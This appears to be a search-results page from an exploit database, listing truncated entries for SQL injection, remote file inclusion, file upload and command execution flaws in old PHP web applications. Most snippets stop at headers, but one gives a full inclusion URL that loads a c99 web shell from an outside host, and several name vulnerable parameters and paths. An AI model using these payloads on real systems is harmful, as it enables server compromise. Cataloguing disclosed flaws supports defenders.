649 matches found
PHPDirector <= 0.21 (videos.php id) Remote SQL Injection Vulnerability
No description provided by source. PHPDirector = 0.21 SQL injection/Upload SHELL Remote Vulnerabilities WEB APP: PHPDirector 0.21 SITE: http://www.phpdirector.co.uk/site/ DORK: Powered by PHP Director AUTHOR: Kw3rLn tehlostbyteatYaHoOd0tCom Romanian Security Team Ethical Hacking -...
Golabi CMS <= 1.0.1 Session Poisoning Vulnerability
No description provided by source. -------------------------------------------------------------------------------- \ \ / \ | | / \ /\ \ \ \ | |/ /\ \ / \ / / | | \ | | // / / \ / | \ | / // /| | \ /|| / / | /| /\ / \ / / / // / /// /...
Picturesolution <= 2.1 - (config.php path) Remote File Inclusion Vuln
No description provided by source. Picturesolution = v2.1 config.php path Remote File Inclusion Vulnerabilities Found By : Mogatil , http://www.hackteach.org/cc/ Posted By : Cold z3ro , http://www.hackteach.org/cc/ Exploit : /install/config.php?path=http://membres.lycos.fr/prirato1/c99.txt? Examp...
Ciamos CMS <= 0.9.6b (config.php) Remote File Include Exploit
No description provided by source. !/usr/bin/perl use LWP::UserAgent; ::::::::: :::::::::: ::: ::: ::::::::::: ::: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ +:+ +:+ +:+ +:+ +:+ ++ +:+ +++:++ ++ +:+ ++ ++ ++ ++ ++ ++ ++ ++ ++ + + + +++ + + ::::::::::: :::::::::: ::: :::: :::: :+: :+: :+: :+: +:+:+: :+:+...
phpIndexPage <= 1.0.1 (config.php) Remote Inclusion Exploit
No description provided by source. !/usr/bin/perl phpindexpage 1.0 & 1.0.1 config.phpRemote File Include Vulnerability Bug Found : DeltahackingTEAM discovery:Dr.Pantagon & Exploitet By Dr.Pantagon Class: Remote File Include Vulnerability exemplary Exp: http://www.site.com/config.php?envincpath=...
DaLogin 2.2 (FCKeditor) Remote Arbitrary File Upload Exploit
No description provided by source. ?php / ----------------------------------------------------------------- DaLogin 2.2 FCKeditor Remote Arbitrary File Upload Exploit -----------------------------------------------------------------...
FreePBX 2.11.0 - Remote Command Execution
No description provided by source. !/usr/bin/perl use strict; use warnings; use IO::Socket::INET; Exploit Title: FreePBX 2.9,2.10,2.11,12 Remote Command Execution Google Dork: n/a Date: 2/25/14 Exploit Author: @0x00string Vendor Homepage: http://www.freepbx.org/ Software Link:...
Plume CMS <= 1.0.3 (manager_path) Remote File Include Vulnerability
No description provided by source. Vendor: Plume CMS http://plume-cms.net Vuln: Remote File Include Discovered: beford xbefordx gmail com Vulnerable File/Code ./plume-1.0.3/manager/frontinc/prepend.php code includeonce $PXconfig'managerpath'.'/conf/config.php'; /code...
SmodCMS 4.07 (fckeditor) - Remote Arbitrary File Upload Exploit
No description provided by source. ?php / ----------------------------------------------------------------- SmodCMS v.4.07 fckeditor Remote Arbitrary File Upload Exploit -----------------------------------------------------------------...
DM Filemanager 3.9.11 Arbitrary File Upload Vulnerability
No description provided by source. ?php / ----------------------------------------------------------------- DM Filemanager fckeditor Remote Arbitrary File Upload Exploit ----------------------------------------------------------------- Vendor: www.dutchmonkey.com Download :...
Podcast Generator <= 1.2 unauthorized Re-Installation Remote Exploit
No description provided by source. ?php Podcast Generator = 1.2 unauthorized CMS Re-Installation Remote Exploit by staker -------------------------------------- mail: stakerathotmaildotit url: http://podcastgen.sourceforge.net -------------------------------------- it works with registerglobals=o...
LokiCMS <= 0.3.3 - Remote Command Execution Exploit
No description provided by source. Author: GiReX mySite: girex.altervista.org Date: 8/04/08 CMS: LokiCMS = 0.3.3 Site: lokicms.com Bug: PHP Code Injection Exploit: Remote Command Execution Vuln Code: admin.php if $GET'default' != '' // User want's to set the default page writeconfig$cpassword,...
RedBLoG 0.5 admin/config.php root_path Parameter Remote File Inclusion
No description provided by source. source: http://www.securityfocus.com/bid/20115/info The redblog application is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the...
Thatware <= 0.4.6 (root_path) Remote File Include Vulnerability
No description provided by source. Thatware 0.4.6 rootpath Remote File Inclusion CreW: ToXiC Bug Found by Drago84 Source Code: http://ufpr.dl.sourceforge.net/sourceforge/thatware/thatware0.4.6.tar.gz Page Affect config.php ExP:...
phpBB <= 2.0.10 Remote Command Execution Exploit
No description provided by source. !/usr/bin/perl use IO::Socket; @@@@@@@ @@@ @@@ @@@@@@ @@@ @@@ @@! @@@ @@! @@@ !@@ @@! @@@ @!@!!@! @!@ !@! !@@!! @!@!@!@! !!: :!! !!: !!! !:! !!: !!! : : : :.:: : ::.: : : : : phpBB = 2.0.10 remote commands exec exploit based on...
Modernbill <= 1.6 (config.php) Remote File Include Vulnerability
No description provided by source. !/usr/bin/env python coding: utf-8 from pocsuite.net import req from pocsuite.poc import POCBase, Output from pocsuite.utils import register class TestPOCPOCBase: vulID = '63791' ssvid version = '1.0' author = '皮皮' vulDate = '2006-08-09' createDate = '2015-12-24...
HDWiki5.1后台拿shell
简要描述: 登录管理后台,插入的代码可以执行 详细说明: 登录管理后台,全局 网站URL处,写入php代码 代码写入到config.php文件 访问config.php文件 漏洞证明: 如上...
C2FO: c2fo.com is releasing sensitive Information about Database Configuration.
Hello C2FO Securiity Team, Vulnerability Details : Disclosure of Database Username and Password of c2fo.com Description: Your configuration file of your website is available to download from your website c2fo.com.When i thought to pentest your site,i landed on https://c2fo.com .But instead of...
Horizon QCMS "/lib/functions/d-load.php"目录遍历漏洞
CVE ID:CVE-2013-7138 Horizon QCMS是支持PHP与MySQL的开放源码的Horizon快速内容管理系统。 该漏洞的存在是由于传递到"/lib/functions/d-load.php"脚本的"start" HTTP GET参数"fopen"方法中被使用前没有足够过滤,远程攻击者可以以Web服务器的权限在目标系统上读取任意文件内容。 0 Horizon QCMS=4.0 厂商补丁: Horizon ----- Horizon 4.0版本以修复此漏洞,建议用户下载使用:...
DedeCMS 5.7 config.php 跨站脚本漏洞
dedecms 5.7 config.php 跨站脚本漏洞 \include\dialog\config.php $cuserLogin = new userLogin; if$cuserLogin-getUserID 提示:需输入后台管理目录才能登录请输入后台管理目录名:", "javascript:;"; exit; $gurl = "../../$adminDirHand/login.php?gotopage=".urlencode$dedeNowurl; echo "location='$gurl';"; exit; 对用户提交的$adminDirHand...